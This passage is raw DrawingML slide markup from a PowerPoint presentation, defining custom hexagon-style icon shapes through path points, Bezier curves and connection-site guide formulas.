                      <a:pt x="44768" y="238744"/>
                      <a:pt x="44768" y="232172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44768" y="225600"/>
                      <a:pt x="50102" y="220266"/>
                      <a:pt x="56674" y="220266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="127159" y="220266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155448" y="191976"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="172403" y="208931"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="201740" y="238268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201740" y="308467"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="201740" y="315039"/>
                      <a:pt x="207074" y="320373"/>
                      <a:pt x="213646" y="320373"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="220218" y="320373"/>
                      <a:pt x="225552" y="315039"/>
                      <a:pt x="225552" y="308467"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="225552" y="262080"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270605" y="307134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185833" y="356092"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="177737" y="360759"/>
                      <a:pt x="167735" y="360759"/>
                      <a:pt x="159639" y="356092"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="74390" y="306848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121063" y="260175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121063" y="308467"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="121063" y="315039"/>
                      <a:pt x="126397" y="320373"/>
                      <a:pt x="132969" y="320373"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139541" y="320373"/>
                      <a:pt x="144875" y="315039"/>
                      <a:pt x="144875" y="308467"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="144875" y="236363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172307" y="208931"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="292037" y="294846"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="308705" y="285226"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="316801" y="280559"/>
                      <a:pt x="321850" y="271891"/>
                      <a:pt x="321850" y="262557"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="321850" y="120825"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="321850" y="111490"/>
                      <a:pt x="316897" y="102822"/>
                      <a:pt x="308705" y="98155"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="292608" y="88821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242602" y="138827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289941" y="138827"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="296513" y="138827"/>
                      <a:pt x="301847" y="144161"/>
                      <a:pt x="301847" y="150733"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301847" y="157305"/>
                      <a:pt x="296513" y="162639"/>
                      <a:pt x="289941" y="162639"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="218789" y="162639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189262" y="192167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217551" y="220456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289941" y="220456"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="296513" y="220456"/>
                      <a:pt x="301847" y="225790"/>
                      <a:pt x="301847" y="232362"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301847" y="238935"/>
                      <a:pt x="296513" y="244269"/>
                      <a:pt x="289941" y="244269"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="241364" y="244269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292037" y="294942"/>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3A31571-FF82-4B1A-475A-5DCBCD41BA27}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8142557" y="2976319"/>
                <a:ext cx="971576" cy="1079532"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 146636 w 342899"/>
                  <a:gd name="connsiteY0" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX1" fmla="*/ 196264 w 342899"/>
                  <a:gd name="connsiteY1" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX2" fmla="*/ 318086 w 342899"/>
                  <a:gd name="connsiteY2" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX3" fmla="*/ 342900 w 342899"/>
                  <a:gd name="connsiteY3" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX4" fmla="*/ 342900 w 342899"/>
                  <a:gd name="connsiteY4" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX5" fmla="*/ 318086 w 342899"/>
                  <a:gd name="connsiteY5" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX6" fmla="*/ 256140 w 342899"/>
                  <a:gd name="connsiteY6" fmla="*/ 339738 h 381000"/>
                  <a:gd name="connsiteX7" fmla="*/ 252683 w 342899"/>
                  <a:gd name="connsiteY7" fmla="*/ 341738 h 381000"/>
                  <a:gd name="connsiteX8" fmla="*/ 196264 w 342899"/>
                  <a:gd name="connsiteY8" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX9" fmla="*/ 146636 w 342899"/>
                  <a:gd name="connsiteY9" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX10" fmla="*/ 24814 w 342899"/>
                  <a:gd name="connsiteY10" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX11" fmla="*/ 0 w 342899"/>
                  <a:gd name="connsiteY11" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX12" fmla="*/ 0 w 342899"/>
                  <a:gd name="connsiteY12" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX13" fmla="*/ 24814 w 342899"/>
                  <a:gd name="connsiteY13" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX14" fmla="*/ 146636 w 342899"/>
                  <a:gd name="connsiteY14" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX15" fmla="*/ 306271 w 342899"/>
                  <a:gd name="connsiteY15" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX16" fmla="*/ 249586 w 342899"/>
                  <a:gd name="connsiteY16" fmla="*/ 316211 h 381000"/>
                  <a:gd name="connsiteX17" fmla="*/ 199532 w 342899"/>
                  <a:gd name="connsiteY17" fmla="*/ 260137 h 381000"/>
                  <a:gd name="connsiteX18" fmla="*/ 220986 w 342899"/>
                  <a:gd name="connsiteY18" fmla="*/ 266338 h 381000"/>
                  <a:gd name="connsiteX19" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY19" fmla="*/ 251489 h 381000"/>
                  <a:gd name="connsiteX20" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY20" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX21" fmla="*/ 306271 w 342899"/>
                  <a:gd name="connsiteY21" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX22" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY22" fmla="*/ 225038 h 381000"/>
                  <a:gd name="connsiteX23" fmla="*/ 225256 w 342899"/>
                  <a:gd name="connsiteY23" fmla="*/ 243068 h 381000"/>
                  <a:gd name="connsiteX24" fmla="*/ 172830 w 342899"/>
                  <a:gd name="connsiteY24" fmla="*/ 193938 h 381000"/>
                  <a:gd name="connsiteX25" fmla="*/ 172761 w 342899"/>
                  <a:gd name="connsiteY25" fmla="*/ 193519 h 381000"/>
                  <a:gd name="connsiteX26" fmla="*/ 184166 w 342899"/>
                  <a:gd name="connsiteY26" fmla="*/ 143151 h 381000"/>
                  <a:gd name="connsiteX27" fmla="*/ 193587 w 342899"/>
                  <a:gd name="connsiteY27" fmla="*/ 136960 h 381000"/>
                  <a:gd name="connsiteX28" fmla="*/ 216167 w 342899"/>
                  <a:gd name="connsiteY28" fmla="*/ 137322 h 381000"/>
                  <a:gd name="connsiteX29" fmla="*/ 217137 w 342899"/>
                  <a:gd name="connsiteY29" fmla="*/ 138055 h 381000"/>
                  <a:gd name="connsiteX30" fmla="*/ 225586 w 342899"/>
                  <a:gd name="connsiteY30" fmla="*/ 159696 h 381000"/>
                  <a:gd name="connsiteX31" fmla="*/ 234746 w 342899"/>
                  <a:gd name="connsiteY31" fmla="*/ 173688 h 381000"/>
                  <a:gd name="connsiteX32" fmla="*/ 248723 w 342899"/>
                  <a:gd name="connsiteY32" fmla="*/ 164525 h 381000"/>
                  <a:gd name="connsiteX33" fmla="*/ 232588 w 342899"/>
                  <a:gd name="connsiteY33" fmla="*/ 120139 h 381000"/>
                  <a:gd name="connsiteX34" fmla="*/ 177971 w 342899"/>
                  <a:gd name="connsiteY34" fmla="*/ 101022 h 381000"/>
                  <a:gd name="connsiteX35" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY35" fmla="*/ 189214 h 381000"/>
                  <a:gd name="connsiteX36" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY36" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX37" fmla="*/ 36630 w 342899"/>
                  <a:gd name="connsiteY37" fmla="*/ 97555 h 381000"/>
                  <a:gd name="connsiteX38" fmla="*/ 158453 w 342899"/>
                  <a:gd name="connsiteY38" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX39" fmla="*/ 184448 w 342899"/>
                  <a:gd name="connsiteY39" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX40" fmla="*/ 306271 w 342899"/>
                  <a:gd name="connsiteY40" fmla="*/ 97555 h 381000"/>
                  <a:gd name="connsiteX41" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY41" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX42" fmla="*/ 319268 w 342899"/>
                  <a:gd name="connsiteY42" fmla="*/ 225038 h 381000"/>
                  <a:gd name="connsiteX43" fmla="*/ 149376 w 342899"/>
                  <a:gd name="connsiteY43" fmla="*/ 196748 h 381000"/>
                  <a:gd name="connsiteX44" fmla="*/ 148963 w 342899"/>
                  <a:gd name="connsiteY44" fmla="*/ 193157 h 381000"/>
                  <a:gd name="connsiteX45" fmla="*/ 128855 w 342899"/>
                  <a:gd name="connsiteY45" fmla="*/ 336747 h 381000"/>
                  <a:gd name="connsiteX46" fmla="*/ 158453 w 342899"/>
                  <a:gd name="connsiteY46" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX47" fmla="*/ 184448 w 342899"/>
                  <a:gd name="connsiteY47" fmla="*/ 353854 h 381000"/>
                  <a:gd name="connsiteX48" fmla="*/ 227924 w 342899"/>
                  <a:gd name="connsiteY48" fmla="*/ 328727 h 381000"/>
                  <a:gd name="connsiteX49" fmla="*/ 159269 w 342899"/>
                  <a:gd name="connsiteY49" fmla="*/ 233924 h 381000"/>
                  <a:gd name="connsiteX50" fmla="*/ 149544 w 342899"/>
                  <a:gd name="connsiteY50" fmla="*/ 198006 h 381000"/>
                  <a:gd name="connsiteX51" fmla="*/ 149462 w 342899"/>
                  <a:gd name="connsiteY51" fmla="*/ 197463 h 381000"/>
                  <a:gd name="connsiteX52" fmla="*/ 149376 w 342899"/>
                  <a:gd name="connsiteY52" fmla="*/ 196748 h 381000"/>
                  <a:gd name="connsiteX53" fmla="*/ 104188 w 342899"/>
                  <a:gd name="connsiteY53" fmla="*/ 322498 h 381000"/>
                  <a:gd name="connsiteX54" fmla="*/ 139730 w 342899"/>
                  <a:gd name="connsiteY54" fmla="*/ 159791 h 381000"/>
                  <a:gd name="connsiteX55" fmla="*/ 168860 w 342899"/>
                  <a:gd name="connsiteY55" fmla="*/ 125120 h 381000"/>
                  <a:gd name="connsiteX56" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY56" fmla="*/ 225504 h 381000"/>
                  <a:gd name="connsiteX57" fmla="*/ 23632 w 342899"/>
                  <a:gd name="connsiteY57" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX58" fmla="*/ 36630 w 342899"/>
                  <a:gd name="connsiteY58" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX59" fmla="*/ 104188 w 342899"/>
                  <a:gd name="connsiteY59" fmla="*/ 32249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42899" h="381000">
                    <a:moveTo>
                      <a:pt x="146636" y="6658"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="161992" y="-2219"/>
                      <a:pt x="180909" y="-2219"/>
                      <a:pt x="196264" y="6658"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="318086" y="77067"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="333442" y="85944"/>
                      <a:pt x="342900" y="102346"/>
                      <a:pt x="342900" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="342900" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="342900" y="278663"/>
                      <a:pt x="333442" y="295065"/>
                      <a:pt x="318086" y="303933"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="256140" y="339738"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="255093" y="340614"/>
                      <a:pt x="253921" y="341281"/>
                      <a:pt x="252683" y="341738"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="196264" y="374342"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="180909" y="383219"/>
                      <a:pt x="161992" y="383219"/>
                      <a:pt x="146636" y="374342"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24814" y="303933"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9459" y="295065"/>
                      <a:pt x="0" y="278663"/>
                      <a:pt x="0" y="260909"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="102346"/>
                      <a:pt x="9459" y="85944"/>
                      <a:pt x="24814" y="77067"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="146636" y="6658"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="306271" y="283445"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="249586" y="316211"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="229564" y="299390"/>
                      <a:pt x="212509" y="280045"/>
                      <a:pt x="199532" y="260137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="206312" y="262900"/>
                      <a:pt x="213517" y="264966"/>
                      <a:pt x="220986" y="266338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="251228" y="271901"/>
                      <a:pt x="286640" y="266567"/>
                      <a:pt x="319268" y="251489"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="319268" y="270205"/>
                      <a:pt x="314314" y="278797"/>
                      <a:pt x="306271" y="283445"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="319268" y="225038"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="287712" y="242211"/>
                      <a:pt x="252939" y="248164"/>
                      <a:pt x="225256" y="243068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196728" y="237820"/>
                      <a:pt x="176969" y="221409"/>
                      <a:pt x="172830" y="193938"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172809" y="193796"/>
                      <a:pt x="172785" y="193662"/>
                      <a:pt x="172761" y="193519"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170213" y="173469"/>
                      <a:pt x="174006" y="156134"/>
                      <a:pt x="184166" y="143151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="187402" y="140561"/>
                      <a:pt x="190564" y="138493"/>
                      <a:pt x="193587" y="136960"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="203660" y="131836"/>
                      <a:pt x="210884" y="132921"/>
                      <a:pt x="216167" y="137322"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216480" y="137589"/>
                      <a:pt x="216804" y="137827"/>
                      <a:pt x="217137" y="138055"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224649" y="145142"/>
                      <a:pt x="226941" y="153191"/>
                      <a:pt x="225586" y="159696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224257" y="166097"/>
                      <a:pt x="228357" y="172355"/>
                      <a:pt x="234746" y="173688"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="241134" y="175022"/>
                      <a:pt x="247392" y="170917"/>
                      <a:pt x="248723" y="164525"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="252144" y="148076"/>
                      <a:pt x="245325" y="131759"/>
                      <a:pt x="232588" y="120139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="219793" y="108461"/>
                      <a:pt x="200822" y="101108"/>
                      <a:pt x="177971" y="101022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136609" y="100879"/>
                      <a:pt x="82578" y="124311"/>
                      <a:pt x="23632" y="189214"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="120091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23632" y="110795"/>
                      <a:pt x="28587" y="102203"/>
                      <a:pt x="36630" y="97555"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="158453" y="27146"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="166496" y="22498"/>
                      <a:pt x="176405" y="22498"/>
                      <a:pt x="184448" y="27146"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="306271" y="97555"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="314314" y="102203"/>
                      <a:pt x="319268" y="110795"/>
                      <a:pt x="319268" y="120091"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="319268" y="225038"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="149376" y="196748"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="149221" y="195548"/>
                      <a:pt x="149083" y="194348"/>
                      <a:pt x="148963" y="193157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133359" y="228429"/>
                      <a:pt x="123523" y="277635"/>
                      <a:pt x="128855" y="336747"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="158453" y="353854"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="166496" y="358502"/>
                      <a:pt x="176405" y="358502"/>
                      <a:pt x="184448" y="353854"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="227924" y="328727"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="196752" y="300942"/>
                      <a:pt x="172435" y="267233"/>
                      <a:pt x="159269" y="233924"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154569" y="222037"/>
                      <a:pt x="151205" y="209922"/>
                      <a:pt x="149544" y="198006"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149517" y="197825"/>
                      <a:pt x="149489" y="197644"/>
                      <a:pt x="149462" y="197463"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149426" y="197225"/>
                      <a:pt x="149397" y="196987"/>
                      <a:pt x="149376" y="196748"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="104188" y="322498"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="100903" y="253527"/>
                      <a:pt x="117006" y="197063"/>
                      <a:pt x="139730" y="159791"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148435" y="145513"/>
                      <a:pt x="158349" y="133683"/>
                      <a:pt x="168860" y="125120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133319" y="128588"/>
                      <a:pt x="82180" y="153514"/>
                      <a:pt x="23632" y="225504"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23632" y="260909"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23632" y="270205"/>
                      <a:pt x="28587" y="278797"/>
                      <a:pt x="36630" y="283445"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="104188" y="322498"/>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E601BBC8-E3C4-D512-6D99-28DF8734D938}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9850528" y="3882387"/>
                <a:ext cx="978742" cy="1087491"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY0" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX1" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY1" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX2" fmla="*/ 318087 w 342900"/>
                  <a:gd name="connsiteY2" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX3" fmla="*/ 342900 w 342900"/>
                  <a:gd name="connsiteY3" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX4" fmla="*/ 342900 w 342900"/>
                  <a:gd name="connsiteY4" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX5" fmla="*/ 318087 w 342900"/>
                  <a:gd name="connsiteY5" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX6" fmla="*/ 196264 w 342900"/>
                  <a:gd name="connsiteY6" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX7" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY7" fmla="*/ 374342 h 381000"/>
                  <a:gd name="connsiteX8" fmla="*/ 24814 w 342900"/>
                  <a:gd name="connsiteY8" fmla="*/ 303933 h 381000"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY9" fmla="*/ 260909 h 381000"/>
                  <a:gd name="connsiteX10" fmla="*/ 0 w 342900"/>
                  <a:gd name="connsiteY10" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX11" fmla="*/ 24814 w 342900"/>
                  <a:gd name="connsiteY11" fmla="*/ 77067 h 381000"/>
                  <a:gd name="connsiteX12" fmla="*/ 146636 w 342900"/>
                  <a:gd name="connsiteY12" fmla="*/ 6658 h 381000"/>
                  <a:gd name="connsiteX13" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY13" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX14" fmla="*/ 182247 w 342900"/>
                  <a:gd name="connsiteY14" fmla="*/ 26013 h 381000"/>
                  <a:gd name="connsiteX15" fmla="*/ 180444 w 342900"/>
                  <a:gd name="connsiteY15" fmla="*/ 168316 h 381000"/>
                  <a:gd name="connsiteX16" fmla="*/ 229353 w 342900"/>
                  <a:gd name="connsiteY16" fmla="*/ 131036 h 381000"/>
                  <a:gd name="connsiteX17" fmla="*/ 220972 w 342900"/>
                  <a:gd name="connsiteY17" fmla="*/ 93202 h 381000"/>
                  <a:gd name="connsiteX18" fmla="*/ 224338 w 342900"/>
                  <a:gd name="connsiteY18" fmla="*/ 50197 h 381000"/>
                  <a:gd name="connsiteX19" fmla="*/ 184448 w 342900"/>
                  <a:gd name="connsiteY19" fmla="*/ 27146 h 381000"/>
                  <a:gd name="connsiteX20" fmla="*/ 254038 w 342900"/>
                  <a:gd name="connsiteY20" fmla="*/ 213312 h 381000"/>
                  <a:gd name="connsiteX21" fmla="*/ 194280 w 342900"/>
                  <a:gd name="connsiteY21" fmla="*/ 187652 h 381000"/>
                  <a:gd name="connsiteX22" fmla="*/ 248346 w 342900"/>
                  <a:gd name="connsiteY22" fmla="*/ 147190 h 381000"/>
                  <a:gd name="connsiteX23" fmla="*/ 319017 w 342900"/>
                  <a:gd name="connsiteY23" fmla="*/ 116481 h 381000"/>
                  <a:gd name="connsiteX24" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY24" fmla="*/ 120091 h 381000"/>
                  <a:gd name="connsiteX25" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY25" fmla="*/ 171069 h 381000"/>
                  <a:gd name="connsiteX26" fmla="*/ 280275 w 342900"/>
                  <a:gd name="connsiteY26" fmla="*/ 189690 h 381000"/>
                  <a:gd name="connsiteX27" fmla="*/ 254038 w 342900"/>
                  <a:gd name="connsiteY27" fmla="*/ 213312 h 381000"/>
                  <a:gd name="connsiteX28" fmla="*/ 246079 w 342900"/>
                  <a:gd name="connsiteY28" fmla="*/ 62770 h 381000"/>
                  <a:gd name="connsiteX29" fmla="*/ 304456 w 342900"/>
                  <a:gd name="connsiteY29" fmla="*/ 96507 h 381000"/>
                  <a:gd name="connsiteX30" fmla="*/ 250353 w 342900"/>
                  <a:gd name="connsiteY30" fmla="*/ 119139 h 381000"/>
                  <a:gd name="connsiteX31" fmla="*/ 244531 w 342900"/>
                  <a:gd name="connsiteY31" fmla="*/ 91326 h 381000"/>
                  <a:gd name="connsiteX32" fmla="*/ 246079 w 342900"/>
                  <a:gd name="connsiteY32" fmla="*/ 62770 h 381000"/>
                  <a:gd name="connsiteX33" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY33" fmla="*/ 196196 h 381000"/>
                  <a:gd name="connsiteX34" fmla="*/ 293674 w 342900"/>
                  <a:gd name="connsiteY34" fmla="*/ 209179 h 381000"/>
                  <a:gd name="connsiteX35" fmla="*/ 274761 w 342900"/>
                  <a:gd name="connsiteY35" fmla="*/ 225743 h 381000"/>
                  <a:gd name="connsiteX36" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY36" fmla="*/ 260737 h 381000"/>
                  <a:gd name="connsiteX37" fmla="*/ 319269 w 342900"/>
                  <a:gd name="connsiteY37" fmla="*/ 196196 h 381000"/>
                  <a:gd name="connsiteX38" fmla="*/ 249635 w 342900"/>
                  <a:gd name="connsiteY38" fmla="*/ 237963 h 381000"/>
                  <a:gd name="connsiteX39" fmla="*/ 251509 w 342900"/>
                  <a:gd name="connsiteY39" fmla="*/ 239068 h 381000"/>
                  <a:gd name="connsiteX40" fmla="*/ 307977 w 342900"/>
                  <a:gd name="connsiteY40" fmla="*/ 282369 h 381000"/>
                  <a:gd name="connsiteX41" fmla="*/ 306271 w 342900"/>
                  <a:gd name="connsiteY41" fmla="*/ 283445 h 381000"/>
                  <a:gd name="connsiteX42" fmla="*/ 264416 w 342900"/>
                  <a:gd name="connsiteY42" fmla="*/ 307639 h 381000"/>
                  <a:gd name="connsiteX43" fmla="*/ 227807 w 342900"/>
                  <a:gd name="connsiteY43" fmla="*/ 282254 h 381000"/>
                  <a:gd name="connsiteX44" fmla="*/ 193293 w 342900"/>
                  <a:gd name="connsiteY44" fmla="*/ 271110 h 381000"/>
                  <a:gd name="connsiteX45" fmla="*/ 186747 w 342900"/>
                  <a:gd name="connsiteY45" fmla="*/ 210083 h 381000"/>
                  <a:gd name="connsiteX46" fmla="*/ 249635 w 342900"/>
                  <a:gd name="connsiteY46" fmla="*/ 237963 h 381000"/>
                  <a:gd name="connsiteX47" fmla="*/ 217646 w 342900"/>
                  <a:gd name="connsiteY47" fmla="*/ 303619 h 381000"/>
                  <a:gd name="connsiteX48" fmla="*/ 242722 w 342900"/>
                  <a:gd name="connsiteY48" fmla="*/ 320173 h 381000"/>
                  <a:gd name="connsiteX49" fmla="*/ 185779 w 342900"/>
                  <a:gd name="connsiteY49" fmla="*/ 353092 h 381000"/>
                  <a:gd name="connsiteX50" fmla="*/ 192745 w 342900"/>
                  <a:gd name="connsiteY50" fmla="*/ 295237 h 381000"/>
                  <a:gd name="connsiteX51" fmla="*/ 217646 w 342900"/>
                  <a:gd name="connsiteY51" fmla="*/ 303619 h 381000"/>
                  <a:gd name="connsiteX52" fmla="*/ 161452 w 342900"/>
                  <a:gd name="connsiteY52" fmla="*/ 355340 h 381000"/>
                  <a:gd name="connsiteX53" fmla="*/ 169695 w 342900"/>
                  <a:gd name="connsiteY53" fmla="*/ 277292 h 381000"/>
                  <a:gd name="connsiteX54" fmla="*/ 163356 w 342900"/>
                  <a:gd name="connsiteY54" fmla="*/ 213541 h 381000"/>
                  <a:gd name="connsiteX55" fmla="*/ 110885 w 342900"/>
